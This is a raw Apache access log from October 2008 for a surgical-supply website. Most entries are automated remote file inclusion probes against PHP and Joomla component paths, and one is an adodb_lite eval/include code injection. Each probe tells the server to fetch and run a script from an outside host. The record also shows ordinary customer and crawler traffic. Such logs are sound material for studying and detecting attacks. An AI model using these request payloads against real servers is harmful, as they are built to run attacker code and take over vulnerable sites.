160.99.12.231 - - [03/Oct/2008:01:25:35 -0400] "GET /logs/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:25:35 -0400] "GET /logs/error_log.Q108061400/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:25:35 -0400] "GET /senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:25:35 -0400] "GET /senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:25:35 -0400] "GET /logs/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:25:36 -0400] "GET /logs/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:25:40 -0400] "GET /logs/access_log.Q108090600//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:25:40 -0400] "GET //index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:25:40 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
24.97.13.141 - - [03/Oct/2008:01:25:44 -0400] "GET /logs/access_log.Q108082100/?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
160.99.12.231 - - [03/Oct/2008:01:26:07 -0400] "GET /logs/error_log.Q108070100/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:26:07 -0400] "GET /logs/error_log.Q108070100/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
160.99.12.231 - - [03/Oct/2008:01:26:07 -0400] "GET /logs/error_log.Q108070100/senetman/html/index.php?page=http://albmotion.com//users/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
76.9.3.130 - - [03/Oct/2008:01:27:03 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:27:03 -0400] "GET /logs/access_log.Q108081200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:27:03 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:27:03 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
209.59.12.99 - - [03/Oct/2008:01:27:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.1.24.160 - - [03/Oct/2008:01:28:10 -0400] "GET /logs/error_log.Q108082200//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:28:34 -0400] "GET /logs/access_log.Q108090600//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:28:34 -0400] "GET //index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:28:36 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
61.129.78.149 - - [03/Oct/2008:01:28:48 -0400] "GET /logs/error_log.Q108091500//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.129.78.149 - - [03/Oct/2008:01:28:50 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.6.17.176 - - [03/Oct/2008:01:29:50 -0400] "GET /logs/error_log.Q108070600 HTTP/1.0" 200 274172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
61.129.78.149 - - [03/Oct/2008:01:30:15 -0400] "GET /logs/error_log.Q108091500//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:30:15 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:30:16 -0400] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.814"
151.1.24.160 - - [03/Oct/2008:01:30:43 -0400] "GET /logs/error_log.Q108082200//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
209.59.12.99 - - [03/Oct/2008:01:32:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.17.176 - - [03/Oct/2008:01:32:06 -0400] "GET /logs/access_log.Q108041800 HTTP/1.0" 200 3501824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
24.97.13.141 - - [03/Oct/2008:01:33:31 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
78.159.111.131 - - [03/Oct/2008:01:33:31 -0400] "GET /logs/senetman/html/index.php?page=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:01:33:31 -0400] "GET /senetman/html/index.php?page=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:01:33:31 -0400] "GET /logs/access_log.Q108052700/senetman/html/index.php?page=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
216.180.251.34 - - [03/Oct/2008:01:33:39 -0400] "GET /logs/access_log.Q108072700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
216.180.251.34 - - [03/Oct/2008:01:33:39 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
216.180.251.34 - - [03/Oct/2008:01:33:40 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
24.97.13.141 - - [03/Oct/2008:01:33:46 -0400] "GET /logs/access_log.Q108082900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
24.97.13.141 - - [03/Oct/2008:01:33:48 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
74.6.17.176 - - [03/Oct/2008:01:33:47 -0400] "GET /logs/error_log.Q108072600 HTTP/1.0" 200 214392 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
24.97.13.141 - - [03/Oct/2008:01:33:52 -0400] "GET /logs/access_log.Q108090200/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
66.79.163.142 - - [03/Oct/2008:01:34:01 -0400] "GET /logs/access_log.Q108070900//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
66.79.163.142 - - [03/Oct/2008:01:34:01 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
66.79.163.142 - - [03/Oct/2008:01:34:02 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
66.79.163.142 - - [03/Oct/2008:01:34:03 -0400] "GET /logs/access_log.Q108070800//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
61.129.78.149 - - [03/Oct/2008:01:34:06 -0400] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
198.170.100.144 - - [03/Oct/2008:01:34:49 -0400] "GET /logs/access_log.Q108072000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.0" 404 235 "-" "libwww-perl/5.50"
198.170.100.144 - - [03/Oct/2008:01:34:49 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.0" 404 208 "-" "libwww-perl/5.50"
198.170.100.144 - - [03/Oct/2008:01:34:50 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.0" 404 213 "-" "libwww-perl/5.50"
198.170.100.144 - - [03/Oct/2008:01:35:14 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.0" 404 235 "-" "libwww-perl/5.50"
216.180.251.34 - - [03/Oct/2008:01:35:18 -0400] "GET /logs/access_log.Q108072200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
74.6.17.176 - - [03/Oct/2008:01:35:07 -0400] "GET /logs/access_log.Q108092600 HTTP/1.0" 200 4301944 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.79.163.142 - - [03/Oct/2008:01:35:43 -0400] "GET /logs/access_log.Q108092200//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
66.79.163.142 - - [03/Oct/2008:01:35:43 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
66.79.163.142 - - [03/Oct/2008:01:35:43 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
66.79.163.142 - - [03/Oct/2008:01:35:51 -0400] "GET /logs/access_log.Q108090800//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
66.79.163.142 - - [03/Oct/2008:01:36:06 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
74.6.17.176 - - [03/Oct/2008:01:36:15 -0400] "GET /logs/error_log.Q108061200 HTTP/1.0" 200 366901 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.176 - - [03/Oct/2008:01:36:43 -0400] "GET /images/_notes/nav_store_search_off_r1_c3.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
61.129.78.149 - - [03/Oct/2008:01:36:56 -0400] "GET /logs/access_log.Q108061500//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.180.251.34 - - [03/Oct/2008:01:37:08 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
74.6.17.176 - - [03/Oct/2008:01:36:34 -0400] "GET /logs/error_log.Q108092200 HTTP/1.0" 200 2591389 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.176.94 - - [03/Oct/2008:01:37:56 -0400] "GET /logs/access_log.Q108090900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.111.176.94 - - [03/Oct/2008:01:37:57 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.111.176.94 - - [03/Oct/2008:01:37:57 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Oct/2008:01:37:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
198.170.100.144 - - [03/Oct/2008:01:38:21 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.0" 404 208 "-" "libwww-perl/5.50"
74.6.17.176 - - [03/Oct/2008:01:38:18 -0400] "GET /logs/access_log.Q107062100 HTTP/1.0" 200 2702163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.111.176.94 - - [03/Oct/2008:01:39:36 -0400] "GET /logs/error_log.Q108082500//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
61.129.78.149 - - [03/Oct/2008:01:39:41 -0400] "GET /logs/access_log.Q108032100//convert/mvcw.php?step=1&vwar_root=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:39:42 -0400] "GET //convert/mvcw.php?step=1&vwar_root=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:39:42 -0400] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://db0642e4.joyent.us/id.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.814"
66.172.9.3 - - [03/Oct/2008:01:39:54 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.9.3 - - [03/Oct/2008:01:39:54 -0400] "GET /index.php?redir=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.16.16.206 - - [03/Oct/2008:01:39:55 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:40:27 -0400] "GET /logs/access_log.Q108061300/index.php?redir=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.9.3 - - [03/Oct/2008:01:40:45 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:40:45 -0400] "GET /index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:40:46 -0400] "GET /logs/index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:40:46 -0400] "GET /logs/access_log.Q108061300/index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
24.228.10.78 - - [03/Oct/2008:01:40:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:40:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:41:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:41:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
66.172.9.3 - - [03/Oct/2008:01:41:25 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:41:25 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:41:25 -0400] "GET /index.php?redir=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:41:25 -0400] "GET /index.php?redir=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:41:25 -0400] "GET /logs/index.php?redir=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:41:25 -0400] "GET /logs/index.php?redir=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.79.163.142 - - [03/Oct/2008:01:41:28 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
66.172.9.3 - - [03/Oct/2008:01:41:49 -0400] "GET /logs/access_log.Q108061300/index.php?redir=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.172.9.3 - - [03/Oct/2008:01:41:50 -0400] "GET /logs/access_log.Q108061300/index.php?redir=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
218.38.34.152 - - [03/Oct/2008:01:42:03 -0400] "GET /index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
218.38.34.152 - - [03/Oct/2008:01:42:03 -0400] "GET /logs/access_log.Q108062200/index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.38.34.152 - - [03/Oct/2008:01:42:03 -0400] "GET /logs/index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
218.38.34.152 - - [03/Oct/2008:01:42:04 -0400] "GET /logs/access_log.Q108061300/index.php?redir=http://vnc2009.webcindario.com/idr0x.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
24.228.10.78 - - [03/Oct/2008:01:42:21 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03 HTTP/1.1" 200 61003 "http://www.acesurgical.com/nonresorbable.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:22 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:22 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:22 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:22 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:23 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
24.228.10.78 - - [03/Oct/2008:01:42:24 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
